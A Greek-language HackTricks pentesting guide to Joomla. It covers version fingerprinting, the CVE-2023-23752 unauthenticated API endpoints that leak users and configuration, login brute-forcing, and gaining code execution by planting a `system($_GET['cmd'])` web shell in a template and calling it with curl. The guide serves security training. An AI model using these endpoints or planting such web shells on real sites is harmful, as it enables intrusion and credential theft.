Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Το Joomla συλλέγει ορισμένα ανώνυμα στατιστικά χρήσης όπως η κατανομή των εκδόσεων Joomla, PHP και βάσεων δεδομένων και των λειτουργικών συστημάτων διακομιστών που χρησιμοποιούνται σε εγκαταστάσεις Joomla. Αυτά τα δεδομένα μπορούν να ανακτηθούν μέσω του δημόσιου API τους.
Ελέγξτε το meta
robots.txt
README.txt
Στο /administrator/manifests/files/joomla.xml μπορείτε να δείτε την έκδοση.
Στο /language/en-GB/en-GB.xml μπορείτε να βρείτε την έκδοση του Joomla.
Στο plugins/system/cache/cache.xml μπορείτε να δείτε μια περίπου έκδοση.
In 80,443 - Pentesting Web Methodology είναι μια ενότητα σχετικά με τους σαρωτές CMS που μπορούν να σαρώσουν το Joomla.
Οι εκδόσεις από 4.0.0 έως 4.2.7 είναι ευάλωτες σε μη αυθεντικοποιημένη αποκάλυψη πληροφοριών (CVE-2023-23752) που θα εκθέσει διαπιστευτήρια και άλλες πληροφορίες.
Χρήστες: http://<host>/api/v1/users?public=true
Αρχείο Ρυθμίσεων: http://<host>/api/index.php/v1/config/application?public=true
MSF Module: scanner/http/joomla_api_improper_access_checks
ή ruby script: 51334
Μπορείτε να χρησιμοποιήσετε αυτό το script για να προσπαθήσετε να κάνετε brute force την είσοδο.
Αν καταφέρατε να αποκτήσετε διαπιστευτήρια διαχειριστή, μπορείτε να RCE μέσα σε αυτό προσθέτοντας ένα κομμάτι PHP κώδικα για να αποκτήσετε RCE. Μπορούμε να το κάνουμε αυτό προσαρμόζοντας ένα θέμα.
Κάντε κλικ στο Templates
στο κάτω αριστερό μέρος κάτω από Configuration
για να εμφανιστεί το μενού θεμάτων.
Κάντε κλικ σε ένα όνομα θέματος. Ας επιλέξουμε το protostar
κάτω από την επικεφαλίδα στήλης Template
. Αυτό θα μας φέρει στη σελίδα Templates: Customise
.
Τέλος, μπορείτε να κάνετε κλικ σε μια σελίδα για να εμφανίσετε την πηγή της σελίδας. Ας επιλέξουμε τη σελίδα error.php
. Θα προσθέσουμε μια PHP one-liner για να αποκτήσουμε εκτέλεση κώδικα ως εξής:
system($_GET['cmd']);
Αποθήκευση & Κλείσιμο
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Σενάριο εκμετάλλευσης Joomla που ανεβάζει XSS σε RCE ή άλλες κρίσιμες ευπάθειες. Για περισσότερες πληροφορίες δείτε αυτή την ανάρτηση. Παρέχει υποστήριξη για εκδόσεις Joomla 5.X.X, 4.X.X και 3.X.X, και επιτρέπει να:
Αύξηση Δικαιωμάτων: Δημιουργεί έναν χρήστη στο Joomla.
(RCE) Επεξεργασία Ενσωματωμένων Θεμάτων: Επεξεργάζεται Ενσωματωμένα Θέματα στο Joomla.
(Custom) Προσαρμοσμένες Εκμεταλλεύσεις: Προσαρμοσμένες Εκμεταλλεύσεις για Πρόσθετα Τρίτων στο Joomla.
Εμβαθύνετε την εμπειρία σας στην Ασφάλεια Κινητών με την 8kSec Academy. Κατακτήστε την ασφάλεια iOS και Android μέσω των αυτορυθμιζόμενων μαθημάτων μας και αποκτήστε πιστοποίηση:
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)